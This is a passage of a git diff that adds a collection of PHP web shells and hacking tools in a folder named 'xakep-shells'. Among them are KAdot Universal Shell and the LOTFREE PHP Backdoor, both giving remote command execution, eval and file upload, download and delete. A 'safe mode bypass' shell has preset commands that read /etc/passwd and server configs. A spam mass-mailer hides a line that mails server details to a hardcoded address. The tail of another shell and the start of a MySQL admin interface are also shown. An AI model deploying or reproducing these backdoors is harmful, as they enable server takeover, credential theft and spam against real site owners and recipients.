+    echo "Ðàçìåð:" .$_FILES['file']['size']. "\n";
+
+} else {
+    print "Íå óäà¸òñÿ çàãðóçèòü ôàéëî. Èíôà:\n";
+    print_r($_FILES);
+}
+}
+break;
+
+
+// Whois
+case "whois":
+echo <<<HTML
+<b>Whois</b>
+<table>
+<form action="$self" method="POST">
+<input type="hidden" name="ac" value="whois">
+<tr>
+<td>Äîìåí:</td>
+<td><input size="40" type="text" name="wq"></td>
+</tr>
+<tr>
+<td>Õóéç ñåðâåð:</td>
+<td><input size="40" type="text" name="wser" value="whois.ripe.net"></td>
+</tr>
+<tr><td>
+<input align="right" type="submit" value="Enter">
+</td></tr>
+$tend
+HTML;
+
+if (isset($_POST['wq']) && $_POST['wq']<>"") {
+
+if (empty($_POST['wser'])) {$wser = "whois.ripe.net";} else $wser = $_POST['wser'];
+
+$querty = $_POST['wq']."\r\n";
+$fp = fsockopen($wser, 43);
+
+if (!$fp) {echo "Íå ìîãó îòêðûòü ñîêåò";} else {
+fputs($fp, $querty);
+while(!feof($fp)){echo fgets($fp, 4000);}
+fclose($fp);
+}}
+break;
+
+
+}
+?>
+</pre>
+</body>
+</html>
\ No newline at end of file
diff --git a/xakep-shells/PHP/KAdot Universal Shell v0.1.6.html.txt b/xakep-shells/PHP/KAdot Universal Shell v0.1.6.html.txt
new file mode 100644
index 0000000..933de04
--- /dev/null
+++ b/xakep-shells/PHP/KAdot Universal Shell v0.1.6.html.txt	
@@ -0,0 +1,229 @@
+<!--
+
+/+--------------------------------+\
+ |            KA_uShell           |
+ |    <KAdot Universal Shell>     |
+ |         Version 0.1.6          |
+ |            13.03.04            |
+ |  Author: KAdot <KAdot@ngs.ru>  |
+ |--------------------------------|
+\+                                +/
+
+-->
+<html>
+<head>
+<title>KA_uShell 0.1.6</title>
+<style type="text/css">
+<!--
+body, table{font-family:Verdana; font-size:12px;}
+table {background-color:#EAEAEA; border-width:0px;}
+b {font-family:Arial; font-size:15px;}
+a{text-decoration:none;}
+-->
+</style>
+</head>
+<body>
+
+<?php
+$self = $_SERVER['PHP_SELF'];
+$docr = $_SERVER['DOCUMENT_ROOT'];
+$sern = $_SERVER['SERVER_NAME'];
+$tend = "</tr></form></table><br><br><br><br>";
+
+// Configuration
+$login = "admin";
+$pass = "123";
+
+
+/*/ Authentication
+if (!isset($_SERVER['PHP_AUTH_USER'])) {
+header('WWW-Authenticate: Basic realm="KA_uShell"');
+header('HTTP/1.0 401 Unauthorized');
+exit;}
+
+else {
+if(empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_PW']<>$pass || empty($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']<>$login)
+{ echo "×òî íàäî?"; exit;}
+}
+*/
+
+
+
+if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
+elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
+else {$ac = "shell";}
+
+// Menu
+echo "
+|<a href=$self?ac=shell>Shell</a>|
+|<a href=$self?ac=upload>File Upload</a>|
+|<a href=$self?ac=tools>Tools</a>|
+|<a href=$self?ac=eval>PHP Eval Code</a>|
+|<a href=$self?ac=whois>Whois</a>|
+<br><br><br><pre>";
+
+
+switch($ac) {
+
+// Shell
+case "shell":
+
+echo <<<HTML
+<b>Shell</b>
+<table>
+<form action="$self" method="POST">
+<input type="hidden" name="ac" value="shell">
+<tr><td>
+$$sern <input size="50" type="text" name="c"><input align="right" type="submit" value="Enter">
+</td></tr>
+<tr><td>
+<textarea cols="100" rows="25">
+HTML;
+
+if (!empty($_POST['c'])){
+passthru($_POST['c']);
+}
+echo "</textarea></td>$tend";
+break;
+
+
+//PHP Eval Code execution
+case "eval":
+
+echo <<<HTML
+<b>PHP Eval Code</b>
+<table>
+<form method="POST" action="$self">
+<input type="hidden" name="ac" value="eval">
+<tr>
+<td><textarea name="ephp" rows="10" cols="60"></textarea></td>
+</tr>
+<tr>
+<td><input type="submit" value="Enter"></td>
+$tend
+HTML;
+
+if (isset($_POST['ephp'])){
+eval($_POST['ephp']);
+}
+break;
+
+
+//Text tools
+case "tools":
+
+echo <<<HTML
+<b>Tools</b>
+<table>
+<form method="POST" action="$self">
+<input type="hidden" name="ac" value="tools">
+<tr>
+<td>
+<input type="radio" name="tac" value="1">B64 Decode<br>
+<input type="radio" name="tac" value="2">B64 Encode<br><hr>
+<input type="radio" name="tac" value="3">md5 Hash
+</td>
+<td><textarea name="tot" rows="5" cols="42"></textarea></td>
+</tr>
+<tr>
+<td> </td>
+<td><input type="submit" value="Enter"></td>
+$tend
+HTML;
+
+if (!empty($_POST['tot']) && !empty($_POST['tac'])) {
+
+switch($_POST['tac']) {
+
+case "1":
+echo "Ðàñêîäèðîâàííûé òåêñò:<b>" .base64_decode($_POST['tot']). "</b>";
+break;
+
+case "2":
+echo "Êîäèðîâàííûé òåêñò:<b>" .base64_encode($_POST['tot']). "</b>";
+break;
+
+case "3":
+echo "Êîäèðîâàííûé òåêñò:<b>" .md5($_POST['tot']). "</b>";
+break;
+}}
+break;
+
+
+// Uploading
+case "upload":
+
+echo <<<HTML
+<b>File Upload</b>
+<table>
+<form enctype="multipart/form-data" action="$self" method="POST">
+<input type="hidden" name="ac" value="upload">
+<tr>
+<td>Ôàéëî:</td>
+<td><input size="48" name="file" type="file"></td>
+</tr>
+<tr>
+<td>Ïàïêà:</td>
+<td><input size="48" value="$docr/" name="path" type="text"><input type="submit" value="Ïîñëàòü"></td>
+$tend
+HTML;
+
+if (isset($_POST['path'])){
+
+$uploadfile = $_POST['path'].$_FILES['file']['name'];
+if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
+
+if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
+    echo "Ôàéëî óñïåøíî çàãðóæåí â ïàïêó $uploadfile\n";
+    echo "Èìÿ:" .$_FILES['file']['name']. "\n";
+    echo "Ðàçìåð:" .$_FILES['file']['size']. "\n";
+
+} else {
+    print "Íå óäà¸òñÿ çàãðóçèòü ôàéëî. Èíôà:\n";
+    print_r($_FILES);
+}
+}
+break;
+
+
+// Whois
+case "whois":
+echo <<<HTML
+<b>Whois</b>
+<table>
+<form action="$self" method="POST">
+<input type="hidden" name="ac" value="whois">
+<tr>
+<td>Äîìåí:</td>
+<td><input size="40" type="text" name="wq"></td>
+</tr>
+<tr>
+<td>Õóéç ñåðâåð:</td>
+<td><input size="40" type="text" name="wser" value="whois.ripe.net"></td>
+</tr>
+<tr><td>
+<input align="right" type="submit" value="Enter">
+</td></tr>
+$tend
+HTML;
+
+if (isset($_POST['wq']) && $_POST['wq']<>"") {
+
+if (empty($_POST['wser'])) {$wser = "whois.ripe.net";} else $wser = $_POST['wser'];
+
+$querty = $_POST['wq']."\r\n";
+$fp = fsockopen($wser, 43);
+
+if (!$fp) {echo "Íå ìîãó îòêðûòü ñîêåò";} else {
+fputs($fp, $querty);
+while(!feof($fp)){echo fgets($fp, 4000);}
+fclose($fp);
+}}
+break;
+
+
+}
+?>
+</pre>
+</body>
+</html>
\ No newline at end of file
diff --git a/xakep-shells/PHP/LOTFREE.php.php.txt b/xakep-shells/PHP/LOTFREE.php.php.txt
new file mode 100644
index 0000000..06f2321
--- /dev/null
+++ b/xakep-shells/PHP/LOTFREE.php.php.txt
@@ -0,0 +1,133 @@
+<?php
+function good_link($link)
+{
+  $link=ereg_replace("/+","/",$link);
+  $link=ereg_replace("/[^/(..)]+/\.\.","/",$link);
+  $link=ereg_replace("/+","/",$link);
+  if(!strncmp($link,"./",2) && strlen($link)>2)$link=substr($link,2);
+  if($link=="")$link=".";
+  return $link;
+}
+
+$dir=isset($_REQUEST['dir'])?$_REQUEST['dir']:".";
+$dir=good_link($dir);
+$rep=opendir($dir);
+chdir($dir);
+
+if(isset($_REQUEST["down"]) && $_REQUEST["down"]!="")
+{
+  header("Content-Type: application/octet-stream");
+  header("Content-Length: ".filesize($_REQUEST["down"]));
+  header("Content-Disposition: attachment; filename=".basename($_REQUEST["down"]));
+  readfile($_REQUEST["down"]);
+  exit();
+}
+?>
+<html>
+<head><title>LOTFREE PHP Backdoor v1.5</title></head>
+<body>
+<br>
+<?php
+  echo "Actuellement dans <b>".getcwd()."</b><br>\n";
+  echo "<b>dir = '$dir'</b><br>\n";
+  echo "Cliquez sur un nom de fichier pour lancer son telechargement. Cliquez sur une croix pour effacer un fichier !<br><br>\n";
+ 
+  if(isset($_REQUEST['cmd']) && $_REQUEST['cmd']!="")
+  {
+    echo "<pre>\n";
+    system($_REQUEST['cmd']);
+    echo "</pre>\n";
+  }
+
+  if(isset($_FILES["fic"]["name"]) && isset($_POST["MAX_FILE_SIZE"]))
+  {
+    if($_FILES["fic"]["size"]<$_POST["MAX_FILE_SIZE"])
+    {
+      if(move_uploaded_file($_FILES["fic"]["tmp_name"],good_link("./".$_FILES["fic"]["name"])))
+      {
+        echo "fichier telecharge dans ".good_link("./".$_FILES["fic"]["name"])."!<br>\n";
+      }
+      else echo "upload failed: ".$_FILES["fic"]["error"]."<br>\n";
+    }
+    else echo "fichier trop gros!<br>\n";
+  }
+
+  if(isset($_REQUEST['rm']) && $_REQUEST['rm']!="")
+  {
+    if(unlink($_REQUEST['rm']))echo "fichier ".$_REQUEST['rm']." efface !<br>\n";
+    else echo "Impossible de supprimer le fichier<br>\n";
+  }
+
+?>
+<hr>
+<table align="center" width="95%" border="0" cellspacing="0" bgcolor="lightblue">
+<?php
+  $t_dir=array();
+  $t_file=array();
+  $i_dir=0;
+  $i_file=0;
+  while($x=readdir($rep))
+  {
+    if(is_dir($x))$t_dir[$i_dir++]=$x;
+    else $t_file[$i_file++]=$x;
+  }
+  closedir($rep);
+  while(1)
+  {
+?>
+<tr>
+  <td width="20%" bgcolor="lightgray" valign="top">
+<?php
+    if($x=each($t_dir))
+    {
+      $name=$x["value"];
+      if($name=='.'){}
+      elseif($name=='..') echo "    <a href='".$_SERVER['PHP_SELF']."?dir=".good_link("$dir/../")."'>UP</a><br><br>\n";
+      else echo "    <a href='".$_SERVER['PHP_SELF']."?dir=".good_link("$dir/$name")."'>".$name."</a>\n";
+    }
+?>
+  </td>
+  <td width='78%'<?php
+    if($y=each($t_file))
+    {
+      if($y["key"]%2==0)echo " bgcolor='lightgreen'>\n";
+      else echo ">\n";
+      echo "    <a href='".$_SERVER['PHP_SELF']."?dir=$dir&down=".$y["value"]."'>".$y["value"]."</a>\n";
+    }
+    else echo ">\n";
+?>
+  </td>
+  <td valign='center' width='2%'<?php
+    if($y)
+    {
+      if($y["key"]%2==0)echo " bgcolor='lightgreen'";
+      echo "><a href='".$_SERVER['PHP_SELF']."?dir=$dir&rm=".$y["value"]."'><b>X</b></a>";
+    }
+    else echo ">\n";
+?></td>
+</tr>
+<?php
+    if(!$x && !$y)break;
+  }
+?>
+</table>
+<hr>
+<br>
+<a href="<?php echo $_SERVER['PHP_SELF']; ?>?dir=">revenir au repertoire d'origine</a><br><br>
+<form method="post" action="<?php echo $_SERVER['PHP_SELF']."?dir=$dir"; ?>">
+Executer une commande <input type="text" name="cmd"> <input type="submit" value="g0!">
+</form><br>
+Uploader un fichier dans le repertoire courant :<br>
+<form enctype="multipart/form-data" method="post" action="<?php echo $_SERVER['PHP_SELF']."?dir=$dir"; ?>">
+<input type="file" name="fic"><input type="hidden" name="MAX_FILE_SIZE" value="100000">
+<input type="submit" value="upl0ad!"></form><br>
+<br>
+<center>
+PHP Backdoor Version 1.5<br>
+by sirius_black / LOTFREE TEAM<br>
+Execute commands, browse the filesystem<br>
+Upload, download and delete files...<br>
+<a href="http://www.lsdp.net/~lotfree">http://www.lsdp.net/~lotfree</a><br>
+</center>
+</body>
+</html>
\ No newline at end of file
diff --git a/xakep-shells/PHP/Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt b/xakep-shells/PHP/Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt
new file mode 100644
index 0000000..06a3035
--- /dev/null
+++ b/xakep-shells/PHP/Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt	
@@ -0,0 +1,34 @@
+<?
+echo "<b><font color=blue>Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit</font></b><br>";
+print_r('
+<pre>
+<form method="POST" action="">
+<b><font color=blue>Komut :</font></b><input name="baba" type="text"><input value="Çalýþtýr" type="submit">
+</form>
+<form method="POST" action="">
+<b><font color=blue>Hýzlý Menü :=) :</font><select size="1" name="liz0">
+<option value="cat /etc/passwd">/etc/passwd</option>
+<option value="netstat -an | grep -i listen">Tüm Açýk Portalarý Gör</option>
+<option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>
+<option value="cat /etc/syslog.conf">/etc/syslog.conf</option>
+<option value="cat /etc/hosts">/etc/hosts</option>
+<option value="cat /etc/named.conf">/etc/named.conf</option>
+<option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>
+</select> <input type="submit" value="Göster Bakim">
+</form>
+</pre>
+');
+ini_restore("safe_mode");
+ini_restore("open_basedir");
+$liz0=shell_exec($_POST[baba]); 
+$liz0zim=shell_exec($_POST[liz0]); 
+$uid=shell_exec('id');
+$server=shell_exec('uname -a');
+echo "<pre><h4>";
+echo "<b><font color=red>Kimim Ben :=)</font></b>:$uid<br>";
+echo "<b><font color=red>Server</font></b>:$server<br>";
+echo "<b><font color=red>Komut Sonuçlarý:</font></b><br>"; 
+echo $liz0;
+echo $liz0zim;
+echo "</h4></pre>";
+?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/Moroccan Spamers Ma-EditioN By GhOsT.php.txt b/xakep-shells/PHP/Moroccan Spamers Ma-EditioN By GhOsT.php.txt
new file mode 100644
index 0000000..2865e14
--- /dev/null
+++ b/xakep-shells/PHP/Moroccan Spamers Ma-EditioN By GhOsT.php.txt	
@@ -0,0 +1,182 @@
+<? 
+if ($action=="send"){ 
+$message = urlencode($message); 
+$message = ereg_replace("%5C%22", "%22", $message); 
+$message = urldecode($message); 
+$message = stripslashes($message); 
+$subject = stripslashes($subject); 
+} 
+
+?> 
+<form name="form1" method="post" action="" enctype="multipart/form-data"> 
+<div align="center"> 
+<center> 
+<table border="2" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#006699" width="74%" id="AutoNumber1"> 
+<tr> 
+<td width="100%"> 
+<div align="center"> 
+<center> 
+<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber2"> 
+<tr> 
+<td width="100%"> 
+<p align="center"><div align="center"> 
+<center> 
+<table border="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#336699" width="70%" cellpadding="0" id="AutoNumber1" height="277"> 
+<tr> 
+<td width="100%" height="272"> 
+<table width="769" border="0" height="303"> 
+<tr> 
+<td width="786" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic3.gif" colspan="3" height="28"> 
+<p align="center"><b><font face="Tahoma" size="2" color="#FF6600">  Moroccan Spamers Ma-EditioN By GhOsT </font></b></td> 
+</tr> 
+<tr> 
+<td width="79" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22" align="right"> 
+<div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Your 
+Email:</font></div> 
+</td> 
+<td width="390" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+<input name="from" value="<? print $from; ?>" size="30" style="float: left"></font><div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Your 
+Name:</font></div> 
+</td> 
+<td width="317" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22" valign="middle"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+<input type="text" name="realname" value="<? print $realname; ?>" size="30"> 
+</font></td> 
+</tr> 
+<tr> 
+<td width="79" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22" align="right"> 
+<div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Reply-To:</font></div> 
+</td> 
+<td width="390" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+<input name="replyto" value="<? print $replyto; ?>" size="30" style="float: left"></font><div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Attach 
+File:</font></div> 
+</td> 
+<td width="317" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+<input type="file" name="file" size="30"> 
+</font></td> 
+</tr> 
+<tr> 
+<td width="79" background="/simparts/images/cellpic1.gif" height="22" align="right"> 
+<div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Subject:</font></div> 
+</td> 
+<td colspan="2" width="715" background="/simparts/images/cellpic1.gif" height="22"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+<input name="subject" value="<? print $subject; ?>" size="59" style="float: left"> 
+</font></td> 
+</tr> 
+<tr valign="top"> 
+<td colspan="2" width="477" bgcolor="#CCCCCC" height="189" valign="top"> 
+<div align="left"> 
+<table border="0" cellpadding="2" style="border-collapse: collapse" bordercolor="#111111" width="98%" id="AutoNumber4"> 
+<tr> 
+<td width="100%"> 
+<textarea name="message" cols="56" rows="10"><? print $message; ?></textarea> 
+<br> 
+<input type="radio" name="contenttype" value="plain" checked> 
+<font size="2" face="Tahoma">Plain</font> 
+<input type="radio" name="contenttype" value="html"> 
+<font size="2" face="Tahoma">HTML</font> 
+<input type="hidden" name="action" value="send"> 
+<input type="submit" value="Send Message"> 
+</td> 
+</tr> 
+</table> 
+</div> 
+</td> 
+<td width="317" bgcolor="#CCCCCC" height="187" valign="top"> 
+<div align="center"> 
+<center> 
+<table border="0" cellpadding="2" style="border-collapse: collapse" bordercolor="#111111" width="93%" id="AutoNumber3"> 
+<tr> 
+<td width="100%"> 
+<p align="center"> <textarea name="emaillist" cols="30" rows="10"><? print $emaillist; ?></textarea> 
+</font><br> 
+</td> 
+</tr> 
+</table> 
+</center> 
+</div> 
+</td> 
+</tr> 
+</table> 
+</td> 
+</tr> 
+</table> 
+</center> 
+</div></td> 
+</tr> 
+</table> 
+</center> 
+</div> 
+</td> 
+</tr> 
+</table> 
+</center> 
+</div> 
+<div align="center"> 
+<center> 
+<table border="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="75%" id="AutoNumber5" height="1" cellpadding="0"> 
+<tr> 
+<td width="100%" valign="top" height="1"> 
+<p align="right"><font size="1" face="Tahoma" color="#CCCCCC">Designed by: 
+ v1.5</font></td> 
+</tr> 
+</table> 
+</center> 
+</div> 
+</form> 
+
+<? 
+if ($action=="send"){ 
+
+if (!$from && !$subject && !$message && !$emaillist){ 
+print "Please complete all fields before sending your message."; 
+exit; 
+} 
+
+$allemails = split("\n", $emaillist); 
+$numemails = count($allemails); 
+
+#Open the file attachment if any, and base64_encode it for email transport 
+If ($file_name){ 
+@copy($file, "./$file_name") or die("The file you are trying to upload couldn't be copied to the server"); 
+$content = fread(fopen($file,"r"),filesize($file)); 
+$content = chunk_split(base64_encode($content)); 
+$uid = strtoupper(md5(uniqid(time()))); 
+$name = basename($file); 
+} 
+
+for($x=0; $x<$numemails; $x++){ 
+$to = $allemails[$x]; 
+if ($to){ 
+$to = ereg_replace(" ", "", $to); 
+$message = ereg_replace("&email&", $to, $message); 
+$subject = ereg_replace("&email&", $to, $subject); 
+print "Sending mail to $to....... "; 
+flush(); 
+$header = "From: $realname <$from>\r\nReply-To: $replyto\r\n"; 
+$header .= "MIME-Version: 1.0\r\n"; 
+If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n"; 
+If ($file_name) $header .= "--$uid\r\n"; 
+$header .= "Content-Type: text/$contenttype\r\n"; 
+$header .= "Content-Transfer-Encoding: 8bit\r\n\r\n"; 
+$header .= "$message\r\n"; 
+If ($file_name) $header .= "--$uid\r\n"; 
+If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n"; 
+If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n"; 
+If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n"; $ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+If ($file_name) $header .= "$content\r\n"; 
+If ($file_name) $header .= "--$uid--"; 
+mail($to, $subject, "", $header); 
+print "Spamed'><br>"; 
+flush(); 
+} 
+} 
+
+} 
+?>
+
+
+
+
+
+
+
diff --git a/xakep-shells/PHP/MySQL Web Interface Version 0.8.php.txt b/xakep-shells/PHP/MySQL Web Interface Version 0.8.php.txt
new file mode 100644
index 0000000..9f37027
--- /dev/null
+++ b/xakep-shells/PHP/MySQL Web Interface Version 0.8.php.txt	
@@ -0,0 +1,1302 @@
+<?
+/*
+* MySQL Web Interface Version 0.8
+* -------------------------------
+* Developed By SooMin Kim (smkim@popeye.snu.ac.kr)
+* License : GNU Public License (GPL)
+* Homepage : http://popeye.snu.ac.kr/~smkim/mysql
+*/
+
+$HOSTNAME = "localhost";
+
+function logon() {
+	global $PHP_SELF;
+
+	setcookie( "mysql_web_admin_username" );
+	setcookie( "mysql_web_admin_password" );
+	echo "<html>\n";
+	echo "<head>\n";
+	echo "<title>MySQL Web Interface</title>\n";
+	echo "</head>\n";
+	echo "<body>\n";
+	echo "<table width=100% height=100%><tr><td><center>\n";
+	echo "<table cellpadding=2><tr><td bgcolor=#a4a260><center>\n";
+	echo "<table cellpadding=20><tr><td bgcolor=#ffffff><center>\n";
+	echo "<h1>MySQL Web Interface</h1>\n";
+	echo "<form action='$PHP_SELF'>\n";
+	echo "<input type=hidden name=action value=logon_submit>\n";
+	echo "<table cellpadding=5 cellspacing=1>\n";
+	echo "<tr><td>Username </td><td> <input type=text 
+name=username></td></tr>\n";
+	echo "<tr><td>Password </td><td> <input type=password 
+name=password></td></tr>\n";
+	echo "</table><p>\n";
+	echo "<input type=submit value='Enter'>\n";
+	echo "<input type=reset value='Clear'><br>\n";
+	echo "</form>\n";
+	echo "</center></td></tr></table>\n";
+	echo "</center></td></tr></table>\n";
+	echo "<p><hr width=300>\n";
+	echo "<font size=2>\n";
+	echo "Copyleft &copy; since 1999,\n";
+	echo "<a href='mailto:smkim76@icqmail.com'>SooMin Kim</a><br>\n";
+	echo "<a href='http://popeye.snu.ac.kr/~smkim/mysql'>Hompage<a> is 
+available<br>";
+	echo "</font>\n";
+	echo "</center></td></tr></table>\n";
+	echo "</body>\n";
+	echo "</html>\n";
+}
+
+function logon_submit() {
+	global $username, $password, $PHP_SELF;
+
+	setcookie( "mysql_web_admin_username", $username );
+	setcookie( "mysql_web_admin_password", $password );
+	echo "<html>";
+	echo "<head>";
+	echo "<META HTTP-EQUIV=Refresh CONTENT='0; 
+URL=$PHP_SELF?action=listDBs'>";
+	echo "</head>";
+	echo "</html>";
+}
+
+function echoQueryResult() {
+	global $queryStr, $errMsg;
+
+	if( $errMsg == "" ) $errMsg = "Success";
+	if( $queryStr != "" ) {
+		echo "<table cellpadding=5>\n";
+		echo "<tr><td>Query</td><td>$queryStr</td></tr>\n";
+		echo "<tr><td>Result</td><td>$errMsg</td></tr>\n";
+		echo "</table><p>\n";
+	}
+}
+
+function listDatabases() {
+	global $mysqlHandle, $PHP_SELF;
+
+	echo "<h1>Database List</h1>\n";
+
+	echo "<form action='$PHP_SELF'>\n";
+	echo "<input type=hidden name=action value=createDB>\n";
+	echo "<input type=text name=dbname>\n";
+	echo "<input type=submit value='Create Database'>\n";
+	echo "</form>\n";
+	echo "<hr>\n";
+
+	echo "<table cellspacing=1 cellpadding=5>\n";
+
+	$pDB = mysql_list_dbs( $mysqlHandle );
+	$num = mysql_num_rows( $pDB );
+	for( $i = 0; $i < $num; $i++ ) {
+		$dbname = mysql_dbname( $pDB, $i );
+		echo "<tr>\n";
+		echo "<td>$dbname</td>\n";
+		echo "<td><a 
+href='$PHP_SELF?action=listTables&dbname=$dbname'>Table</a></td>\n";
+		echo "<td><a href='$PHP_SELF?action=dropDB&dbname=$dbname' 
+onClick=\"return confirm('Drop Database 
+\'$dbname\'?')\">Drop</a></td>\n";
+		echo "<td><a 
+href='$PHP_SELF?action=dumpDB&dbname=$dbname'>Dump</a></td>\n";
+		echo "</tr>\n";
+	}
+	echo "</table>\n";
+}
+
+function createDatabase() {
+	global $mysqlHandle, $dbname, $PHP_SELF;
+
+	mysql_create_db( $dbname, $mysqlHandle );
+	listDatabases();
+}
+
+function dropDatabase() {
+	global $mysqlHandle, $dbname, $PHP_SELF;
+
+	mysql_drop_db( $dbname, $mysqlHandle );
+	listDatabases();
+}
+
+function listTables() {
+	global $mysqlHandle, $dbname, $PHP_SELF;
+
+	echo "<h1>Table List</h1>\n";
+	echo "<p class=location>$dbname</p>\n";
+	echoQueryResult();
+	echo "<form action='$PHP_SELF'>\n";
+	echo "<input type=hidden name=action value=createTable>\n";
+	echo "<input type=hidden name=dbname value=$dbname>\n";
+	echo "<input type=text name=tablename>\n";
+	echo "<input type=submit value='Create Table'>\n";
+	echo "</form>\n";
+	echo "<form action='$PHP_SELF'>\n";
+	echo "<input type=hidden name=action value=query>\n";
+	echo "<input type=hidden name=dbname value=$dbname>\n";
+	echo "<input type=text size=40 name=queryStr>\n";
+	//echo "<textarea cols=30 rows=3 name=queryStr></textarea><br>";
+	echo "<input type=submit value='Query'>\n";
+	echo "</form>\n";
+	echo "<hr>\n";
+
+	$pTable = mysql_list_tables( $dbname );
+
+	if( $pTable == 0 ) {
+		$msg  = mysql_error();
+		echo "<h3>Error : $msg</h3><p>\n";
+		return;
+	}
+	$num = mysql_num_rows( $pTable );
+
+	echo "<table cellspacing=1 cellpadding=5>\n";
+
+	for( $i = 0; $i < $num; $i++ ) {
+		$tablename = mysql_tablename( $pTable, $i );
+
+		echo "<tr>\n";
+		echo "<td>\n";
+		echo "$tablename\n";
+		echo "</td>\n";
+		echo "<td>\n";
+		echo "<a 
+href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
+		echo "</td>\n";
+		echo "<td>\n";
+		echo "<a 
+href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename'>Data</a>\n";
+		echo "</td>\n";
+		echo "<td>\n";
+		echo "<a 
+href='$PHP_SELF?action=dropTable&dbname=$dbname&tablename=$tablename' 
+onClick=\"return confirm('Drop Database \'$dbname\'?')\">Drop</a>\n";
+		echo "</td>\n";
+		echo "<td>\n";
+		echo "<a 
+href='$PHP_SELF?action=dumpTable&dbname=$dbname&tablename=$tablename'>Dump</a>\n";
+		echo "</td>\n";
+		echo "</tr>\n";
+	}
+
+	echo "</table>";
+}
+
+function createTable() {
+	global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, 
+$errMsg;
+
+	$queryStr = "CREATE TABLE $tablename ( no INT )";
+	mysql_select_db( $dbname, $mysqlHandle );
+	mysql_query( $queryStr, $mysqlHandle );
+	$errMsg = mysql_error();
+
+	listTables();
+}
+
+function dropTable() {
+	global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, 
+$errMsg;
+
+	$queryStr = "DROP TABLE $tablename";
+	mysql_select_db( $dbname, $mysqlHandle );
+	mysql_query( $queryStr, $mysqlHandle );
+	$errMsg = mysql_error();
+
+	listTables();
+}
+
+function viewSchema() {
+	global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, 
+$errMsg;
+
+	echo "<h1>Table Schema</h1>\n";
+	echo "<p class=location>$dbname &gt; $tablename</p>\n";
+
+	echoQueryResult();
+
+	echo "<a 
+href='$PHP_SELF?action=addField&dbname=$dbname&tablename=$tablename'>Add 
+Field</a> | \n";
+	echo "<a 
+href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename'>View 
+Data</a>\n";
+	echo "<hr>\n";
+
+	$pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
+	$num = mysql_num_rows( $pResult );
+
+	echo "<table cellspacing=1 cellpadding=5>\n";
+	echo "<tr>\n";
+	echo "<th>Field</th>\n";
+	echo "<th>Type</th>\n";
+	echo "<th>Null</th>\n";
+	echo "<th>Key</th>\n";
+	echo "<th>Default</th>\n";
+	echo "<th>Extra</th>\n";
+	echo "<th colspan=2>Action</th>\n";
+	echo "</tr>\n";
+
+	for( $i = 0; $i < $num; $i++ ) {
+		$field = mysql_fetch_array( $pResult );
+		echo "<tr>\n";
+		echo "<td>".$field["Field"]."</td>\n";
+		echo "<td>".$field["Type"]."</td>\n";
+		echo "<td>".$field["Null"]."</td>\n";
+		echo "<td>".$field["Key"]."</td>\n";
+		echo "<td>".$field["Default"]."</td>\n";
+		echo "<td>".$field["Extra"]."</td>\n";
+		$fieldname = $field["Field"];
+		echo "<td><a 
+href='$PHP_SELF?action=editField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname'>Edit</a></td>\n";
+		echo "<td><a 
